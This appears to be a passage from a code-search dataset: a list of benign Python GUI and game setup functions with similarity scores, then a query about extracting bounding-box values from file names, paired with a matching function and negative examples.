MenuFrame.MainMenuFrame(self.uiCoordinator)\n\t\tself.menu_window = self.main_menu_window._mf\n\t\tself.score_window = self.main_menu_window._hf\n\t\tself.instructions_window = self.main_menu_window._if\n\t\tself.menu_window.playButton.focus_set()", "def setup():\n size(SPACE['w'], SPACE['h'])\n colorMode(RGB, 1)", "def gamemode_startscreen(self) -> None:\n self.__draw_startscreen()", "def __init__(self, s_width, s_height, setup):\n pygame.init()\n pygame.font.init()\n\n self.arcade = False\n fullscreen = False\n for opt in setup:\n if opt == Setup.Arcade:\n self.arcade = True\n elif opt == Setup.Fullscreen:\n fullscreen = True\n \n self.joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]\n for j in self.joysticks:\n j.init()\n\n self.display = Display((s_width, s_height), fullscreen)\n self.clock = pygame.time.Clock()\n self.FPS = 60\n\n self.ui = UI(self. display)\n if self.arcade:\n if len(self.joysticks) == 0: \n print(\"=================== plug in the controller ===================\") \n exit(1)\n self.ui.enable_arcade_mode()\n \n self.selected_speed = \"speed Medium\"\n self.game_manager = GameManager(self.display, self.ui, GameMode.EatToGrow, GameState.Menu)", "def setup(self, args={}):\n\n return Status.RUN", "def main():\n run_it = tools.Control(prepare.ORIGINAL_CAPTION)\n state_dict = {\"SPLASH\" : splash.Splash(),\n \"MENU\" : menu.Menu(),\n \"DEMO\" : demo.Demo(),\n \"GAME\" : game.Game()}\n run_it.setup_states(state_dict, \"SPLASH\")\n run_it.main()", "def run():\r\n autostartup()", "def main():\n root = Tk()\n if high_dpi:\n root.call('tk', 'scaling', 4)\n if fullscreen:\n root.attributes('-fullscreen', True)\n root.configure(bg=yellow)\n root.grid_columnconfigure(2, weight=1)\n root.title('NS Fietsenstalling')\n\n MainScreen(root)\n root.mainloop()", "def startMode(self):\n return True, None", "def setupWidget(self):\r\n self.generateCoordinates()\r\n self.modifyCoordinateLists()\r\n self.settings.movementMatrix = self.movementMatrix\r\n self.settings.ghostIntersectionList = self.ghostIntersectionList\r\n self.createBodies()\r\n print(\"GameW set\")", "def setup_screen():\n screen = Screen()\n screen.setup(width=600, height=600)\n screen.bgcolor(\"black\")\n screen.title(\"My Snake Game\")\n screen.tracer(0)\n return screen", "def qsetup(format='screen', filename='dis.out'):\n setFormat(format)\n setFilename(filename)\n setScreenMode()\n initialize()", "def setup(self):\n # Initialize the drawing environment (create main windows, etc)\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB | GLUT_DEPTH)\n glutInitWindowSize(WINDOW_WIDTH, WINDOW_HEIGHT)\n glutCreateWindow(name)\n\n glShadeModel(GL_SMOOTH)\n\n glClearDepth(1.0)\n glDepthFunc(GL_LESS) # The Type Of Depth Test To Do\n glEnable(GL_DEPTH_TEST) # Enables Depth Testing\n glShadeModel(GL_SMOOTH) # Enables Smooth Color Shading\n\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity() # Reset The Projection Matrix\n\n # Calculate The Aspect Ratio Of The Window\n gluPerspective(45.0, float(WINDOW_WIDTH)/float(WINDOW_HEIGHT), 0.1, 100.0)\n\n glMatrixMode(GL_MODELVIEW)\n\n # Set up keyboard listeners.\n glutKeyboardFunc(self.on_key)", "def setup(self):\n self.ui.setup_window()", "def on_start(self):\n self.init()", "def init_modes(self):\n self._verify_not_using_threaded_mpm()\n\n self._init_screenshot_mode()\n self._init_debug_mode()\n self._init_webapi_cors_header()\n self.init_theme()", "def main_loop():\n window = pygame.display.set_mode((640,480))\n pygame.init()\n running = True\n while running:\n model = TronModel(10,640,480)\n view = PyGameWindowView(model,640,480)\n controller = KeyControl(model)\n end_start = False\n end_mode_setup = False\n end_player_setup = False\n game_over = False\n\n while not end_start:\n view.start_screen()\n for event in pygame.event.get():\n if event.type == QUIT: #if the window is closed, break out of the two while loops and go to pygame.quit()\n running = False\n end_start = True\n end_mode_setup = True\n end_player_setup = True\n game_over = True\n if controller.handle_event(event):\n controller.end_start = True\n end_start = True\n\n while not end_mode_setup:\n view.mode_setup()\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n end_mode_setup = True\n end_player_setup = True\n game_over = True\n if controller.handle_mode_setup(event):\n controller.end_mode_setup = True\n end_mode_setup = True\n\n while not end_player_setup:\n if model.mode == \"single\":\n model.num_players = 1\n view.single_player_setup()\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n end_player_setup = True\n game_over = True\n if controller.handle_single(event):\n model.init_players()\n controller.end_player_setup = True\n end_player_setup = True\n if model.mode == \"multi\":\n end_multi1 = False\n while not end_multi1:\n view.multi_player_setup1()\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n end_player_setup = True\n end_multi1 = True\n end_multi2 = True\n game_over = True\n if controller.handle_multi1(event):\n controller.end_multi1 = True\n end_multi1 = True\n if model.num_players == 4:\n end_multi2 = True\n else:\n end_multi2 = False\n while not end_multi2:\n view.multi_player_setup2()\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n end_player_setup = True\n end_multi2 = True\n game_over = True\n if controller.handle_multi2(event):\n controller.end_multi2 = True\n end_multi2 = True\n model.init_players()\n end_player_setup = True\n\n view._init_draw()\n controller.game_start = True\n while not game_over:\n for event in pygame.event.get():\n if event.type == QUIT: #if the window is closed, break out of the two while loops and go to pygame.quit()\n running = False\n game_over = True\n if controller.handle_event(event): #checks to see if the game has ended and the spacebar was pressed, if yes then the inner loop is broken and the game is reinitialized\n game_over = True\n controller.handle_event(event) #handles regular keypress events\n model.update()\n view.draw()\n time.sleep(.1)\n\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n pygame.quit()", "def activate(self):\n self.start()", "def appStarted(self):\n self.color1=self.app.colorset[0]\n self.color2=self.app.colorset[1]\n self.color3=self.app.colorset[2]\n self.rows=6\n self.cols=6\n self.squaresize=800\n self.piecesize=int(self.squaresize/self.cols)\n self.square=([[0]*self.cols for row in range(self.rows)])\n self.side=[0]*self.cols\n \n self.doubleclick=None\n self.temp=None\n self.s=None\n self.imagesize=self.squaresize\n self.image=self.loadImage('level4.png')\n w,h=self.image.size\n scale=min(w,h)\n self.image=self.scaleImage(self.image,self.imagesize/scale)\n self.image=self.image.crop((0,0,self.squaresize,self.squaresize))\n self.imageW,self.imageH=self.image.size\n self.smol=self.scaleImage(self.image,300/scale)\n\n self.pieces=self.createPiece()\n self.pieces.shuffle()\n self.start=False\n self.timer=0\n self.timers=0\n self.timerm=0", "def setup(client):\n client.add_cog(ProcessDisplay(client))", "def guiMode(options):\n configuration = {'config_project_name': 'untitled', 'config_address': '0.0.0.0',\n 'config_port': 8081, 'config_multiple_instance': True, 'config_enable_file_cache': True,\n 'config_start_browser': True, 'config_resourcepath': './res/'}\n start(MainWindow, address=configuration['config_address'], port=configuration['config_port'],\n multiple_instance=configuration['config_multiple_instance'],\n enable_file_cache=configuration['config_enable_file_cache'],\n start_browser=configuration['config_start_browser'])", "def switch_state():\n\tDmg.OpenWindow()", "def setup(self):\n build_world.start_level(self)", "def setup(self):\n self.profile = config.get(\"profile\")\n ui.command(\":cache_show.x__text\", config.get(\"pacman_cache\"))\n\n ulm = (config.get(\"uselocalmirror\") != \"\")\n ui.command(\":mirrorlist.opton\", config.get(\"usemirrorlist\") != \"\")\n ui.command(\":mirrorlist.enable\", not ulm)\n ui.command(\":use_local_mirror.opton\", ulm)\n ui.command(\":local_mirror.x__text\", config.get(\"localmirror\"))\n return True", "def main():\n setup(**setup_params)", "def run():\r\n autostartup()\r\n\r\n if settings.FEATURES.get('USE_CUSTOM_THEME', False):\r\n enable_theme()\r\n\r\n if settings.FEATURES.get('USE_MICROSITES', False):\r\n enable_microsites()\r\n\r\n if settings.FEATURES.get('ENABLE_THIRD_PARTY_AUTH', False):\r\n enable_third_party_auth()", "def start(self):\n return self.setup.start", "def mode_manual(self):\n if self.__check_mode_change():\n self.communications.set_status(\"Piloting Bot\")\n self.__check_move()", "def start(setup):\n run.run_name = setup.entry_run_name.get()\n run.num_cpus = setup.entry_cpus.get()\n run.medium_volume = setup.entry_medium.get()\n run.sim_time = setup.entry_sim_time.get()\n run.timestep = setup.entry_timestep.get()\n run.pop_size = setup.entry_pop_size.get()\n run.death_per_gen = setup.entry_num_deaths.get()\n run.iterations = setup.entry_iter.get()\n run.output_dir = setup.entry_output.get()\n run.pfba = False if setup.var_pfba.get() is 0 else True\n run.enforce_growth = False if setup.var_growth.get() is 0 else True\n run.oxigen = False if setup.var_oxigen.get() is 0 else True\n run.mutation_chance = setup.entry_mutation_chance.get()\n run.deletion_chance = setup.entry_deletion_chance.get()\n run.repeats = setup.entry_repeats.get()\n run.death_rate = setup.entry_death_rate.get()\n run.mutation_freq = setup.entry_mutation_freq.get()\n run.deletion_freq = setup.entry_deletion_freq.get()\n run.crossover_freq = setup.entry_crossover_freq.get()\n run.twopoint = False if setup.var_twopoint is 0 else True\n run.chromosome = setup.entry_chromosome.get()\n run.solver = setup.solver_var.get()\n\n\n if run.mutation_freq + run.deletion_freq + run.crossover_freq != 1:\n print(f\"Mutation: {run.mutation_freq} + Deletion: {run.deletion_freq} + Crossover: {run.crossover_freq} is not eaqual to 1\")\n return\n\n if not os.path.isdir(run.output_dir):\n print(f\"'{run.output_dir}' is not a valid directory\")\n return\n\n if run.chromosome == '':\n run.chromosome = None\n else:\n if not os.path.isfile(run.chromosome):\n print(f\"'{run.chromosome}' does not exist\")\n return\n\n objective = {}\n data_watcher = DataWatcher()\n data_watcher.set_oxygen(run.oxigen)\n data_watcher.set_enforce_growth(run.enforce_growth)\n data_watcher.set_pfba(run.pfba)\n data_watcher.set_death_rate(run.death_rate)\n culture = Culture()\n culture.register_data_watcher(data_watcher)\n\n if len(setup.widgets) < 2:\n print(\"Less than two Species added\")\n return\n\n run.objective = objective\n run.culture = culture\n\n run_page = RunPage(app.container, app)\n run_page.grid(row=0, column=0, sticky=\"nsew\")\n run.graph_page = run_page\n\n run_page.tkraise()\n\n for widget in setup.widgets:\n objective[widget.species.entry_name.get()] = widget.entry_objective.get()\n model = widget.species.entry_model.get()\n if not os.path.isfile(model):\n print(f\"Can not find file: {model}\")\n return\n\n if run.graph_page != None:\n from tkinter import END, DISABLED, NORMAL\n run.graph_page.text.config(state=NORMAL)\n run.graph_page.text.insert(END, f\"Loading Model of Species: {widget.species.entry_name.get()}\\n\")\n run.graph_page.text.config(state=DISABLED)\n\n print(f\"Loading Model of Species: {widget.species.entry_name.get()}\")\n species = Species(widget.species.entry_name.get(), model, widget.species.entry_radius.get(), widget.species.entry_dryweight.get(), run.solver.lower())\n culture.innoculate_species(species, widget.species.entry_innoculation.get())\n\n run.start_process()", "def setup(self, callback=False, display=\"lcd\"):\n self.display_medium = display\n self._setup_gpio_in()\n if callback:\n self._add_event_detect()\n self._add_event_callback()", "def run(self):\r\n\r\n # If any of the test constructors update the settings, reflect\r\n # those changes on the GUI before running\r\n if GUIEnabled:\r\n self.gui_table.updateGUI(self.settings)\r\n self.clock = pygame.time.Clock()\r\n self.screen.fill((0, 0, 0))\r\n\r\n # Run the simulation loop\r\n self.SimulationLoop([0, 0, 0])\r\n\r\n if GUIEnabled and self.settings.drawMenu:\r\n self.gui_app.paint(self.screen)\r\n\r\n pygame.display.flip()\r\n self.clock.tick(self.settings.hz)\r\n self.fps = self.clock.get_fps()", "def onSpawn(self):\n self.spawned = True\n self._interactor.initialiseDevices()", "def start(self):\n self.reset()\n self.on_start()", "def setup(self):\n setup = RandomWordGenerator().get()\n self.formatted_word = ConvertWord().convert_to_dict(setup)\n self.underscore_word = HangmanUnderscoreDiagram(\n setup).create_hidden_word()\n self.failed_guesses = 0\n print(\"Hello\")\n self.has_won = False\n self.start_game(True)", "def main():\n\n window = ArcadeButWithStuff(screen_h=920, screen_w=1080)\n\n window.setup()\n arcade.run()", "def __run(self):\n # init snake show\n self.__init_snake()\n self.__introduction.hide()\n # start ticktock for snake moving\n self.__ticker.start()\n # enable key press\n self.__enable_key = True", "def set_manual_mode(self):\n self._kernel.set_manual_mode()", "def setup(self):\n \n # Define ui file to be used as a graphical interface\n # This file can be edited graphically with Qt Creator\n # sibling_path function allows python to find a file in the same folder\n # as this python module\n self.ui_filename = sibling_path(__file__, \"ant_watch_plot.ui\")\n \n #Load ui file and convert it to a live QWidget of the user interface\n self.ui = load_qt_ui_file(self.ui_filename)\n\n # Measurement Specific Settings\n # This setting allows the option to save data to an h5 data file during a run\n # All settings are automatically added to the Microscope user interface\n self.settings.New('save_video', dtype = bool, initial = False)\n self.settings.New('track_ant',dtype = bool, initial = False)\n self.settings.New('pixel_size', dtype = float, initial = 0.05547850208, ro = True)\n self.settings.New('binning', dtype = int, initial = 16, ro = True)\n self.settings.New('threshold', dtype = int, initial = 85, ro = False)\n self.settings.New('proportional', dtype = float, initial = 0.12, ro = False)\n self.settings.New('integral', dtype = float, initial = 0, ro = False)\n self.settings.New('derivative', dtype = float, initial = 0.05, ro = False)\n \n # x and y is for transmitting signal\n self.settings.New('x',dtype = float, initial = 32, ro = True, vmin = 0, vmax = 63.5)\n self.settings.New('y',dtype = float, initial = 32, ro = True, vmin = 0, vmax = 63.5)\n \n # Define how often to update display during a run\n self.display_update_period = 0.01\n \n \n # Convenient reference to the hardware used in the measurement\n self.track_cam = self.app.hardware['track_cam']\n self.wide_cam = self.app.hardware['wide_cam']\n self.recorder = self.app.hardware['flirrec']\n self.daqmotor = self.app.hardware['daqmotor']\n \n #setup experiment condition\n self.track_cam.settings.frame_rate.update_value(50)\n self.track_cam.read_from_hardware()", "def start(self):\n self.__init__()\n self.set_n_players()\n self.init_players()\n self.init_territory_selection_phase()\n self.init_troop_deployment_phase()\n # self.game_phase()", "def maya_start_up():\n import maya.utils as mu\n mu.executeDeferred(\"import mliber;reload(mliber);mliber.show_in_maya()\")", "def setup_while_running(info: PluginInfo) -> None:\n info.status = Status.LOADING\n\n dummy_parser = argparse.ArgumentParser()\n _run_setup_argument_parser_function(info, dummy_parser)\n if info.status != Status.LOADING: # error\n return\n\n _run_setup_and_set_status(info)\n assert info.status != Status.LOADING\n if info.status == Status.ACTIVE:\n get_main_window().event_generate(\"<<PluginsLoaded>>\")", "def startup(self):\n pass", "def setup(self):\n curses.curs_set(1)\n curses.noecho()\n curses.cbreak()\n # Keypad disabled until scrolling properly implemented\n # self.stdscr.keypad(True)\n self.stdscr.clear()\n self.stdscr.addstr(\"SecureChat v{}\".format(__version__))\n self.chat_container.box()\n self.chat_win.addstr(\"Welcome to SecureChat!\")\n self.chat_win.scrollok(True)\n self.chat_win.setscrreg(0, self.max_y - 5)\n self.prompt_win.addstr(\"> \")\n self.refresh_all()", "def start_game(self):\n self.board = Board(num_tableaus=self.tableau_qty, num_decks=self.decks, deal_3=self.deal_3)\n self.board.init_move_dict()\n self.board.deal(self.deck)\n\n if self.api_use:\n self.init_game_api()\n elif self.commandline:\n self.init_cl_game()\n else:\n self.init_pygame()", "def start_preparation(self):\n from managers.buttons_manager import ButtonsManager\n ButtonsManager(self).begin()", "def set_mode(self, size, *args, **kwargs):\n if env.japplet:\n self.jframe = env.japplet\n else:\n self.jframe = Frame(self.caption, size)\n if self.icon:\n self.jframe.setIconImage(self.icon)\n env.jframe = self.jframe\n self.jpanel = self.jframe.jpanel\n self.surface = self.jpanel.surface\n self.surface._display = self\n self._surfaceRect = self.surface.get_rect()\n self._surface_rect = [self._surfaceRect]\n self._rect_list = None\n self.jframe.setLocationRelativeTo(None)\n self.jframe.setVisible(True)\n self._warmup()\n return self.surface", "def __load_mode_ui(self, new_list):\n self.__add_mode_button()\n if self.__ui_mode == UImode.CANVASCONTROL:\n self.__setup_ui_controls(new_list)\n elif self.__ui_mode == UImode.TEACHPANEL:\n self.__setup_joint_sliders()\n else:\n self.scene.append_to_caption(\"UNKNOWN MODE ENTERED\\n\")", "def setup(self):\n \n # Define ui file to be used as a graphical interface\n # This file can be edited graphically with Qt Creator\n # sibling_path function allows python to find a file in the same folder\n # as this python module\n self.ui_filename = sibling_path(__file__, \"lick_training_plot.ui\")\n \n #Load ui file and convert it to a live QWidget of the user interface\n self.ui = load_qt_ui_file(self.ui_filename)\n\n # Measurement Specific Settings\n # This setting allows the option to save data to an h5 data file during a run\n # All settings are automatically added to the Microscope user interface\n self.settings.New('save_h5', dtype=bool, initial=False)\n self.settings.New('tdelay', dtype=int, initial=0,ro=True)\n self.settings.New('trial_time',dtype=int,initial=10,ro=False)\n self.settings.New('lick_interval', dtype=int, initial=1,ro=False)\n self.settings.New('water_reward', dtype=bool, initial=False,ro=False)\n self.settings.New('total_drops', dtype=int, initial=0,ro=False)\n self.settings.New('save_movie', dtype=bool, initial=False,ro=False)\n self.settings.New('movie_on', dtype=bool, initial=False,ro=True)\n #self.settings.New('sampling_period', dtype=float, unit='s', initial=0.005)\n \n # Create empty numpy array to serve as a buffer for the acquired data\n #self.buffer = np.zeros(10000, dtype=float)\n \n # Define how often to update display during a run\n self.display_update_period = 0.04 \n \n # Convenient reference to the hardware used in the measurement\n self.daq_ai = self.app.hardware['daq_ai']\n self.arduino_sol = self.app.hardware['arduino_sol']\n self.water=self.app.hardware['arduino_water']\n self.camera=self.app.hardware['camera']", "def __toggle_mode(self):\n # Update mode\n # Update mode, default canvas controls\n self.__ui_mode = {\n UImode.CANVASCONTROL: UImode.TEACHPANEL,\n UImode.TEACHPANEL: UImode.CANVASCONTROL\n }.get(self.__ui_mode, UImode.CANVASCONTROL)\n\n # Update UI\n # get list of robots\n new_list = []\n for name in self.__ui_controls.get('menu_robots').choices:\n new_list.append(name)\n\n self.__reload_caption(new_list)", "def setup(self):\n\n self._enable_torque(self._reg.TORQUE_ENABLE)\n self.change_operating_mode(self._reg.MODE_EXT_POSI)\n # set to max velocity\n self.change_veloity(self._default_velocity)", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def mannequin_mode(self, event=None):\n if not self._mannequin_mode:\n self.set_action_status_message('mannequin_mode', 'requested')\n subprocess.Popen(['rosrun', 'pr2_controller_manager', \n 'pr2_controller_manager', 'stop', 'GPSPR2Plugin'], stdout=DEVNULL)\n self._mm_process = subprocess.Popen(['roslaunch',\n 'pr2_mannequin_mode', 'pr2_mannequin_mode.launch'], stdout=DEVNULL)\n self._mannequin_mode = True\n self.set_action_status_message('mannequin_mode', 'completed',\n message='mannequin mode toggled on')\n else:\n self.set_action_status_message('mannequin_mode', 'requested')\n self._mm_process.send_signal(signal.SIGINT)\n subprocess.Popen(['rosrun', 'pr2_controller_manager',\n 'pr2_controller_manager', 'start', 'GPSPR2Plugin'], stdout=DEVNULL)\n self._mannequin_mode = False\n self.set_action_status_message('mannequin_mode', 'completed',\n message='mannequin mode toggled off')", "def onStartAssistModeToggled(self, checked):\r\n # productive\r\n profprint()\r\n if checked:\r\n self.fiducialObturatorButton.checked = 0\r\n self.fiducialButton.checked = 0\r\n self.fiducialButton.text = \"2. Start Giving Needle Tips [CTRL + ENTER]\"\r\n self.start(self.addCTLPoints)\r\n self.startAssistModeButton.text = \"Stop Assisted Manual Segmentation\"\r\n else:\r\n self.stop()\r\n self.startAssistModeButton.text = \"Start Assisted Manual Segmentation\"", "def main(ctx):\n\n print(\"Mode:\")", "def start_game(self):\n\n\t\tpass", "def main():\n setup()\n master = Master()\n master.start()", "def main(themes):\n # Get toggled mode based on current system mode.\n toggled_mode = get_toggled_mode(get_current_mode())\n print('\\nSetting themes...')\n\n for theme in themes:\n # Set toggled mode.\n theme.mode = toggled_mode\n theme.toggle_callback(theme)\n if IS_WINDOWS:\n print(f'Setting system theme to: {toggled_mode.name}')\n toggle_mode(toggled_mode)\n print()", "def init(cls):\n\n cls.configs = yaml.load( file('../local/config.yaml') )\n cls.is_online = False\n cls.state = State.playing\n cls.classes = classes\n cls.guiclasses = guiclasses\n\n # set up pygame and init\n pygame.init()\n\n # Set up the window\n cls.screen = pygame.display.set_mode(\n tuple(cls.configs['options']['resolution']),\n 0,\n 32)\n classes.screen = cls.screen\n guiclasses.screen = cls.screen", "def start(self):\n self.delegate.start_preview(fullscreen=False, window = (350, 10, self.size[0] - 350, self.size[1] - 10))", "def setup():\n print('Setup option is not working')\n quit()\n print('Long press the reset button until the blue Led is blinking quickly')\n print('Long press again until blinking slowly')\n print('Manually connect this device to the Wifi SSID named BlroadlinkProv')\n print('Press security mode (0 = none, 1 = WEP, 2 = WPA1, 3 = WPA2, 4 = WPA1/2)')\n print('Default:3')\n\n security = raw_input('Security mode:').lower()\n\n if security == 'none':\n security = 0\n elif security == 'wep':\n security = 1\n elif security == 'wpa1':\n security = 2\n elif (security == 'wpa2') or (security == ''):\n security = 3\n elif security == 'wpa1/2':\n security = 4\n security = int(security)\n if not(0 <= security <= 4):\n raise IndexError\n\n ssid = raw_input('SSID of your router :')\n if security != 0:\n password = raw_input('Password:')\n else:\n password = ''\n broadlink.setup(ssid, password, security)", "def __init__(self, settings, **kwargs):\n super(MainScreen, self).__init__(**kwargs)\n Clock.schedule_interval(self.update_status_fields, 1*CLOCK_SPEED)\n self.settings = settings\n self.ml_interface.debug = self.debug\n self.ml_interface.mer_ip_address = self.settings[\"ip_address\"]\n self.ml_interface.software_version = str(self.settings[\"software_version\"])\n self.ml_interface.software_title = self.settings[\"title\"]\n self.ml_interface.speed = str(self.settings[\"speed\"])\n self.ml_interface.speed_out = str(self.settings[\"speed_out\"])\n self.standby_position = str(\n self.settings[\"standby_position\"]\n )\n self.requested_position = str(\n self.settings[\"default_requested_position\"]\n )\n self.ml_interface.standby_position = self.standby_position\n self.ml_interface.requested_position = self.requested_position\n self.title = self.ml_interface.software_title\n self.settingsWindow = SettingsWindow(ml_object=self.ml_interface, main_screen = self)\n self.infoWindow = InfoWindow(ml_object=self.ml_interface)\n self.testWindow = TestWindow(self, ml_interface=self.ml_interface)\n if not self.debug:\n self.ml_interface.initialize_poll_connection_thread()\n self.read_thread = threading.Thread(target=self.ml_interface.initialize_read_thread)\n self.read_thread.start()\n self.ml_interface.update_ml()\n self.ml_interface.write()\n self.set_requested_position()\n self.set_standby_position()", "def modes(self, mode):\n # Sends the update to the piston worker\n self.worker_piston.mode = mode\n if mode == 1: # 'VCV'\n self.VCV_start_btn.setEnabled(False)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 2: # 'PCV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(False)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 3: # 'PSV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(False)\n self.stop_btn.setEnabled(True)\n elif mode == 4: # 'Emergency'\n print('Emergency')\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)\n else: # STOP\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)", "def start(cls):\n\n cls._set_mode_running()\n TimeDisplay.start_time()\n for callback in cls.start_callback:\n callback()", "def _startup_system(self):\n\n self._config_path.set(filedialog.asksaveasfilename())\n self._system = System(self._config_path.get())\n\n self._start_frame.pack_forget()\n self._main_frame.pack()", "def set_test_mode(self):\n self._test_mode = True\n self._wins = 0\n self._draws = 0\n self._count = 0\n self._losses = 0" ]
[ "0.6800144", "0.6734263", "0.66898155", "0.66412646", "0.6498546", "0.633072", "0.62841946", "0.6278032", "0.6212285", "0.6206775", "0.62048006", "0.6197723", "0.61908454", "0.6190276", "0.6158729", "0.6156555", "0.61511356", "0.6121974", "0.6118286", "0.6098591", "0.6072834", "0.60583925", "0.60570484", "0.6044386", "0.60377973", "0.60302305", "0.5998851", "0.59982586", "0.5993802", "0.5980473", "0.5972917", "0.5919762", "0.5915006", "0.5911113", "0.5907258", "0.59056765", "0.58958644", "0.5858373", "0.58548194", "0.5852927", "0.58470994", "0.5842645", "0.5828466", "0.58149594", "0.58076674", "0.5804036", "0.5793941", "0.57900834", "0.5786133", "0.57733387", "0.57718873", "0.5771126", "0.5767558", "0.57515067", "0.5750067", "0.5745488", "0.5741431", "0.5728327", "0.57190937", "0.5718519", "0.57145035", "0.5698967", "0.56905955", "0.56874883", "0.56841224", "0.56668645", "0.5662075", "0.56568015", "0.5656511", "0.56528825", "0.5651482", "0.5645521", "0.56423265", "0.5638522", "0.563299", "0.5631248", "0.5620125", "0.5614731", "0.5614488", "0.5613203", "0.56124675", "0.5611486", "0.5611457", "0.5609385", "0.5609385", "0.5609385", "0.56065285", "0.56063527", "0.5601845", "0.5601631", "0.55996025", "0.55949533", "0.5592701", "0.5592468", "0.5584581", "0.5576966", "0.55750054", "0.55738735", "0.557348", "0.55678236" ]
0.7203417
0
Extract bbox info from file name.
def get_bbox(fname): fname = fname.split('_') # fname -> list i = fname.index('bbox') return map(float, fname[i+1:i+5]) # m
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_bbox(fname):\r\n fname = fname.split('_') # fname -> list\r\n i = fname.index('bbox')\r\n return list(map(float, fname[i+1:i+5])) # m\r", "def get_bbox(fname):\r\n\r\n fname = fname.split('_') # fname -> list\r\n i = fname.index('bbox')\r\n return list(map(float, fname[i+1:i+5])) # m\r", "def bbox(self, filename: str) -> str:\n temp = \"/tmp/\" + os.path.basename(filename)\n im = cv2.imread(filename)\n # Draw rectangle for on-screen debugging.\n match = re.search(r\"l(\\d+)_r(\\d+)_t(\\d+)_b(\\d+)_w(\\d+)_h(\\d+)\", filename)\n l = int(match.group(1))\n r = int(match.group(2))\n t = int(match.group(3))\n b = int(match.group(4))\n w = int(match.group(5))\n h = int(match.group(6))\n assert w == r - l\n assert h == b - t\n cv2.rectangle(im, (l, t), (r, b), BLUE, 3)\n cv2.imwrite(temp, im)\n return temp", "def format_bbox_file(self, img_name, data):\r\n\r\n with open(self.bboxes_local, 'w+') as fbbox:\r\n # remove path\r\n bboxes = data.split(' ')[1:]\r\n for i in range(0, len(bboxes), 4):\r\n cur_bbox = bboxes[i:i+4]\r\n fbbox.write(img_name + ' ' + ' '.join(cur_bbox) + '\\n')", "def get_bbox_data(self):\r\n with open(self.bboxes_local, 'r') as fbbox:\r\n data = fbbox.read()\r\n\r\n return data", "def test_get_bounding_box(self):\n\n # Note there are two possible correct values of bbox depending on\n # the version of gdal:\n # http://trac.osgeo.org/gdal/wiki/rfc33_gtiff_pixelispoint\n\n # Get gdal version number\n x = gdal.VersionInfo('').replace('dev', '').split()\n y = x[1].split('.')[:2]\n z = ''.join(y) # Turn into number and\n if z.endswith(','):\n z = z[:-1] # Remove trailing comma\n\n # Reference bbox for vector data\n ref_bbox = {'tsunami_building_exposure.shp': [150.15238387897742,\n -35.71084183517241,\n 150.18779267086208,\n -35.70131768155173]}\n\n # Select correct reference bbox for rasters\n if float(z) < 17:\n ref_bbox['Earthquake_Ground_Shaking_clip.tif'] = [99.3641696,\n -2.2031806,\n 102.2411696,\n -0.0041806]\n else:\n ref_bbox['Earthquake_Ground_Shaking_clip.tif'] = [99.36,\n -2.199,\n 102.237,\n 0.0]\n\n for filename in ['Earthquake_Ground_Shaking_clip.tif',\n 'tsunami_building_exposure.shp']:\n abspath = os.path.join(TESTDATA, filename)\n bbox = get_bounding_box(abspath)\n msg = ('Got bbox %s from filename %s, but expected %s '\n % (str(bbox), filename, str(ref_bbox[filename])))\n assert numpy.allclose(bbox, ref_bbox[filename]), msg\n\n # Check the conversions\n bbox_string = bboxlist2string(bbox)\n\n # Check the check :-)\n check_bbox_string(bbox_string)\n\n # Check that it works for layer objects instantiated from file\n L = read_layer(abspath)\n L_bbox = L.get_bounding_box()\n msg = ('Got bbox %s from filename %s, but expected %s '\n % (str(L_bbox), filename, str(ref_bbox[filename])))\n assert numpy.allclose(L_bbox, ref_bbox[filename]), msg\n\n # Check that it works for layer objects instantiated from data\n if L.is_raster:\n D = Raster(data=L.get_data(),\n projection=L.get_projection(),\n geotransform=L.get_geotransform())\n elif L.is_vector:\n D = Vector(data=L.get_data(),\n projection=L.get_projection(),\n geometry=L.get_geometry())\n else:\n msg = 'Unexpected layer object: %s' % str(L)\n raise RuntimeError(msg)\n\n # Check that get_bounding_box works for data instantiated layers\n D_bbox = D.get_bounding_box()\n msg = ('Got bbox %s from layer %s, but expected %s '\n % (str(D_bbox), str(D), str(L_bbox)))\n assert numpy.allclose(D_bbox, L_bbox), msg", "def _populate_bbox_data(self, filename: str) -> None:\n if self.box_images.get(filename) is None:\n return []\n\n target = self.parse_voc_xml(ET_parse(self.box_targets[filename]).getroot())\n\n # TO-DO\n # The following function can also be used to output pose for each bbox\n bbox = self.get_objects(target)\n\n return bbox", "def bbox_from_json(bbox_file):\n with open(bbox_file, 'r') as f:\n bbox = np.array(json.load(f)['bbox']).astype(np.float32)\n ul_corner = bbox[:2]\n center = ul_corner + 0.5 * bbox[2:]\n width = max(bbox[2], bbox[3])\n scale = width / 200.0\n # make sure the bounding box is rectangular\n return center, scale", "def bbox_from_json(bbox_file):\n with open(bbox_file, 'r') as f:\n bbox = np.array(json.load(f)['bbox']).astype(np.float32)\n ul_corner = bbox[:2]\n center = ul_corner + 0.5 * bbox[2:]\n width = max(bbox[2], bbox[3])\n scale = width / 200.0\n # make sure the bounding box is rectangular\n return center, scale", "def load_bbox(depth_dir, view):\n base_filename = os.path.join(depth_dir, \"%05d\" % view)\n if os.path.exists(base_filename + \".npz\"):\n npz_dict = np.load(base_filename + \".npz\")\n if 'bbox' in npz_dict:\n crop = npz_dict['bbox']\n else:\n crop = None\n else:\n crop = None\n if crop is 